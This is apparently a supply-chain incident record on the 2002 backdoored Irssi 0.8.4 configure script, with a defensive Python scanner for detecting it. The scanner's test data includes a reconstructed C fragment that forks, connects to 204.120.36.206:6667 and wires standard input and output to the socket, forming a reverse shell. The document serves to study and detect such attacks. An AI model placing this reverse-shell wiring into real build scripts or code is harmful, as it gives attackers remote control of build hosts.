Irssi configure script backdoored
The irssi.org server was cracked, and the official Irssi 0.8.4 source distribution served a modified configure script for about two months.
Story
In March 2002, irssi.org was cracked and the Irssi 0.8.4 source distribution was altered through its configure script. For roughly two months, users building from the official source archive could execute attacker-added C code before they ever ran the IRC client. The project disclosed the compromise on May 25 and noted that binaries were not affected.
The delivery point was the build system. The archive still looked like Irssi source, but configure carried the hostile logic. That made the user's normal compile step the execution point, before package install, service startup, or IRC traffic.
The injected code was disguised as a small autoconf test, but the C program it compiled and ran forked into the background, opened a TCP connection to 204.120.36.206 on port 6667, and dup'ed standard input, output, and error onto that socket: the same wiring a reverse shell uses, with the build host on the serving end. The advisory's detection advice was equally direct: grep configure for SOCK_STREAM, replace the source from a clean copy, and verify future releases against the author's GPG key. That string check is tied to this particular sample; a configure script that legitimately tests for socket support can also mention SOCK_STREAM, so a hit needs a look at the surrounding code rather than a reflex.
The cleanup question was therefore about provenance, not configuration. Anyone who ran the configure step from an Irssi 0.8.4 tarball downloaded in the affected window had to treat that build host as compromised, however normal the installed IRC client looked and whether or not it had ever connected to a server.
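The detection advice above, carried through as a small scanner. This is an added example, not code from the irssi project or the advisory. It generalises the single-string grep: a configure script that tests for socket support can legitimately mention SOCK_STREAM, so the scanner rates that hit as merely suspicious and only calls a file backdoored when it also sees the reverse-shell wiring (connect plus dup2 of file descriptors 0, 1 and 2) or the incident's own indicator, 204.120.36.206. The three configure fragments it runs over are constructed for the example; the backdoored one is modelled on the page's description, not on the injected script itself, and nothing in it is compiled or executed.

```python
import re
import sys

# Network indicator from the advisory (host:port the injected code connected to).
IOC_HOST = "204.120.36.206"
IOC_PORT = 6667

# --- Constructed sample inputs (hypothetical fragments, not real configure scripts) ---

# A legitimate-looking autoconf socket check: mentions SOCK_STREAM but never
# connects anywhere.  This is the false positive the bare grep produces.
BENIGN_CONFIGURE = r"""
echo "checking for socket support"
cat >conftest.c <<EOF
#include <sys/socket.h>
int main(void) { return socket(AF_INET, SOCK_STREAM, 0) < 0; }
EOF
$CC conftest.c -o conftest && echo yes
"""

# Modelled on the page's description of the 2002 backdoor: fork, connect to
# the hard-coded host, wire stdin/stdout/stderr to the socket.  Text only.
BACKDOORED_CONFIGURE = r"""
echo "checking for struct sockaddr_in"
cat >conftest.c <<EOF
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
int main(void) {
  struct sockaddr_in sa; int s;
  if (fork() != 0) return 0;
  s = socket(AF_INET, SOCK_STREAM, 0);
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6667);
  sa.sin_addr.s_addr = inet_addr("204.120.36.206");
  connect(s, (struct sockaddr *)&sa, sizeof sa);
  dup2(s, 0); dup2(s, 1); dup2(s, 2);
  return 0;
}
EOF
$CC conftest.c -o conftest && ./conftest
"""

# No socket code at all.
CLEAN_CONFIGURE = r"""
echo "checking for gcc"
cat >conftest.c <<EOF
int main(void) { return 0; }
EOF
$CC conftest.c -o conftest && echo yes
"""

# dup2(<anything>, 0|1|2): the only capture group is the target descriptor.
DUP2_RE = re.compile(r"\bdup2\s*\(\s*\w+\s*,\s*([012])\s*\)")


def scan_configure(text):
    """Return {'verdict': ..., 'indicators': [...]} for one configure script's text."""
    dup_fds = {int(fd) for fd in DUP2_RE.findall(text)}
    found = {
        "sock_stream": "SOCK_STREAM" in text,            # the advisory's grep
        "connect": re.search(r"\bconnect\s*\(", text) is not None,
        "fork": re.search(r"\bfork\s*\(", text) is not None,
        "stdio_dup": {0, 1, 2} <= dup_fds,                 # reverse-shell wiring
        "ioc_host": IOC_HOST in text,
        "ioc_port": re.search(r"\b%d\b" % IOC_PORT, text) is not None,
    }
    if found["ioc_host"] or (found["connect"] and found["stdio_dup"]):
        verdict = "backdoor"
    elif found["sock_stream"] or found["connect"]:
        verdict = "suspicious"   # a socket mention alone: read the surrounding code
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": sorted(k for k, v in found.items() if v)}


def scan_file(path):
    """Scan a configure script on disk (e.g. from an unpacked source tarball)."""
    with open(path, "r", errors="replace") as fh:
        return scan_configure(fh.read())


if __name__ == "__main__":
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            print(path, scan_file(path))
    else:
        for name, text in [("benign", BENIGN_CONFIGURE),
                           ("backdoored", BACKDOORED_CONFIGURE),
                           ("clean", CLEAN_CONFIGURE)]:
            print(name, scan_configure(text))
```

Run it with no arguments to scan the three embedded fragments, or pass the path of a configure script from an unpacked tarball. The "suspicious" verdict on the benign fragment is the point: the advisory's grep is a cheap first pass, and the call to treat a host as compromised should rest on the connect-plus-dup2 shape or the known indicator, both of which the scanner reports separately so a hit can be read for them.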
Affected Artifacts
- Observed: 2002-03-14 to 2002-05-25
- Compromised Versions: 0.8.4 (source distribution only)
- Fixed: Not listed
- Evidence:
  - distribution: irssi.org/files/irssi-0.8.4.tar.gz
  - file: configure
  - observable: 204.120.36.206:6667
  - observable: SOCK_STREAM
Incident Context
- Motive: Unauthorized Access
- Cause: Website Compromise
- Transitive: No
External References
- irssi.org cracked, irssi's configure backdoored for past two months (irssi.org)
- irssi backdoor (artofhacking.com)
- NVD: CVE-2002-1840 (nvd.nist.gov)
- CVEFeed: CVE-2002-1840 (cvefeed.io)
Source record: oss/attacks/irssi/meta.yaml